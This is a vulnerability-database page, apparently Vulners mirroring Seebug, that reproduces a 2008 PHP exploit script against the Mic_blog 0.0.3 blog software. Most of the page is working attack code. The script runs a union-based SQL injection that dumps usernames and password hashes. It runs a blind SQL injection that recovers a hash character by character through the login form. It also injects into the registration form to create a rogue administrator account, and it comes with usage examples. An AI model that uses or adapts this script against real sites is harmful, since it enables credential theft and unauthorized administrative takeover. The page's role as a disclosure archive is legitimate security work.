Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mic_blog 0.0.3 (SQL Injection/Privilege Escalation) Remote Exploit

🗓️ 17 Oct 2008 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 22 Views

Mic_blog 0.0.3 Remote Exploit: SQL Injection and Privilege Escalatio

Code

                                                #!/usr/bin/php -q
<?php

error_reporting(0);
ini_set("default_socket_timeout",5);



/*
   Mic_blog v0.0.3 Multiple Remote Exploit
   -------------------------------------------------------------
   Discovered By StAkeR aka athos - StAkeR[at]hotmail[dot]it
   Discovered On 16/10/2008
   http://miclen.xtreme-corp.net/file/source-mic_blog_v0.0.3-php.tar.gz
   -------------------------------------------------------------
   Exploit Coded By Me
   
   -1 Remote SQL Injection Exploit
   -2 Remote Blind SQL Injection Exploit
   -3 Remote Privilege Escalation Exploit (add a new administrator)
   
*/

function inj3ct_sql($conz,$blog,$prefix,$userid)
{
  $request = "' union select 0,concat(0x616E6172636879".
             ",username,0x3a,password,0x616E6172636879),0,0,0,0,0 from ".
             $prefix ." where id=".$userid."#";
                    
  $request = urlencode($request);
             
  if(!preg_match('/\w:[0-9]/i',$conz)) usage();   
  $host = explode(':',$conz);
  
  if(!$sock = fsockopen($host[0],$host[1])) die("Socket Error\r\n");

  $pack .= "GET /$blog/category.php?cat=$request HTTP/1.1\r\n";
  $pack .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
  $pack .= "Host: $host[0]\r\n";
  $pack .= "Connection: close\r\n\r\n";
  
  fputs($sock,$pack);

  while(!feof($sock)) 
  {
    $inj3ct .= fgets($sock);
  } fclose($sock); 
  
  if(preg_match('/anarchy(.+?)anarchy/',$inj3ct,$zulp))
  { 
    $exp = explode(':',$zulp[1]);
    return $exp;
  }
}

function privilege($inet,$log,$nome,$pass)
{
             
  if(!preg_match('/\w:[0-9]/i',$inet)) usage();
  $real = explode(':',$inet);
  
  if(!$sok = fsockopen($real[0],$real[1])) die("Socket Error\r\n");
  
  $send = 'user='.$nome.'&pass='.$pass.'&pass2='.$pass.'&'.
          '[email protected]&email2=subviolence'.
          '@none.com&mese=4&giorno=3&anno=1993&site=http:'.
          '//google.it '."','2','a')".'#&news=si&click=R';
          
  $pak .= "POST /$log/register.php?reg= HTTP/1.1\r\n";
  $pak .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
  $pak .= "Host: $host[0]\r\n";
  $pak .= "Content-Type: application/x-www-form-urlencoded\r\n";
  $pak .= "Content-Length: ".strlen($send)."\r\n";
  $pak .= "Connection: close\r\n\r\n";
  $pak .= $send;
  
  fputs($sok,$pak);

  while(!feof($sok)) 
  {
    $downme .= fgets($sok);
  } fclose($sok); 
  
  if(preg_match('/utente aggiunto/i',$downme))
  {
    return true;
  }
  else
  {
    return false;
  }
}


if($argv[5] == "normal") 
{
  $normal = inj3ct_sql($argv[1],$argv[2],$argv[3],$argv[4]);
  
  if(isset($normal[0]))
  {
    echo "[?] Password: $normal[1]\r\n";
    echo "[?] Username: $normal[0]\r\n";
    die;
  }
  else
  {
    echo "[?] Exploit Failed!\r\n";
    die;
  }
}
 
if($argv[5] == "privilege")
{
  if(privilege($argv[1],$argv[2],$argv[3],$argv[4]))
  {
    echo "[?] Added New Administrator\r\n";
    echo "[?] Username: $argv[3]\r\n";
    echo "[?] Password: $argv[4]\r\n";
    die;
  }
  else
  {
    echo "[?] Exploit Failed!\r\n";
    die;
  }
}
 
 
function http_request($conn,$path,$post) 
{
  if(!preg_match('/\w:[0-9]/i',$conn)) usage();
  $addr = explode(':',$conn);
  
  $data = "POST /$path/login.php HTTP/1.1\r\n".  
          "Host: $addr[0]\r\n".
          "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
          "Accept-Encoding: text/plain\r\n".
          "Content-Type: application/x-www-form-urlencoded\r\n".
          "Content-Length: ".strlen($post)."\r\n".
          "Connection: close\r\n\r\n".
          $post;
          
                            
  if(!$sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) die("socket_create() error!\r\n");
  if(!socket_set_option($sock,SOL_SOCKET,SO_BROADCAST,1)) die("socket_set_option() error!\r\n"); 
  if(!socket_connect($sock,$addr[0],(int)$addr[1])) die("socket_connect() error!\r\n");
  if(!socket_write($sock,$data,strlen($data))) die("socket_write() errror!\r\n");
  
  while($get = socket_read($sock,1024,PHP_NORMAL_READ)) 
  { 
    $content .= $get; 
  }

  socket_close($sock);
  
  $array = array(
               'HTTP/1.1 404 Not Found',
               'HTTP/1.1 300 Multiple Choices',
               'HTTP/1.1 301 Moved Permanently',
               'HTTP/1.1 302 Found',
               'HTTP/1.1 304 Not Modified',
               'HTTP/1.1 400 Bad Request',
               'HTTP/1.1 401 Unauthorized',
               'HTTP/1.1 402 Payment Required',
               'HTTP/1.1 403 Forbidden',
               'HTTP/1.1 405 Method Not Allowed',
               'HTTP/1.1 406 Not Acceptable',
               'HTTP/1.1 407 Proxy Authentication Required',
               'HTTP/1.1 408 Request Timeout',
               'HTTP/1.1 409 Conflict',
               'HTTP/1.1 410 Gone',
               'HTTP/1.1 411 Length Required',
               'HTTP/1.1 412 Precondition Failed',
               'HTTP/1.1 413 Request Entity Too Large',
               'HTTP/1.1 414 Request-URI Too Long',
               'HTTP/1.1 415 Unsupported Media Type',
               'HTTP/1.1 416 Request Range Not Satisfiable',
               'HTTP/1.1 417 Expectation Failed',
               'HTTP/1.1 Retry With',
              );
               
  for($i=0;$i<=count($array);$i++)
  
  if(eregi($array[$i],$content)) 
  {
    return ("$array[$i]\r\n");
    break;
  } 
  else 
  {
    return ("$content\r\n");
    break;
  }
}


function char($char,$uid,$table,$idz)
{
  return "user=' or ascii(substring((select password from $table where id=$idz),$uid,1))=$char#&pass=aaaaaaaa&click=Login";
}  
 
function usage()
{
  echo "[?] mic blog v0.0.3 Multiple Remote Exploit\r\n\r\n";
  echo "[?] (Remote\Blind) SQL Injection\r\n";
  echo "[?] Usage: php [exploit.php] [host:port] [path blog] [table prefix_user] [user id] [normal or blind]\r\n";
  echo "[?] Example: php mic.php localhost:80 cms mic_user 1 normal\r\n";
  echo "[?] Example: php mic.php localhost:80 cms mic_user 1 blind\r\n\r\n";
  echo "[?] Remote Privilege Escalation\r\n";
  echo "[?] Usage: php mic.php localhost:80 cms [username] [password] [privilege]\r\n";
  echo "[?] Example: php mic.php localhost:80 cms anarchy mypasswordz privilege\r\n";
  
  die;
}
 

$id = 0;
$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);


for($i=0;$i<=32;$i++)
{
  for($j=0;$j<=17;$j++)
  {
    if(!eregi('modules.php',http_request($argv[1],$argv[2],char($hash[$j],$id,$argv[3],$argv[4]))))
    {
      $password .= chr($hash[$j]);
      $id++;
    }
  }
}

if(isset($password))
{
  echo "[?] Hash: $password\r\n[?] ID: $argv[4]\r\n";
  die;
}
else
{
  echo "[?] Exploit Failed!\r\n";
  die;
}


?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Oct 2008 00:00Current
7.1High risk
Vulners AI Score7.1
php-basedremote exploitationsql injectionprivilege escalationsecurity vulnerability
22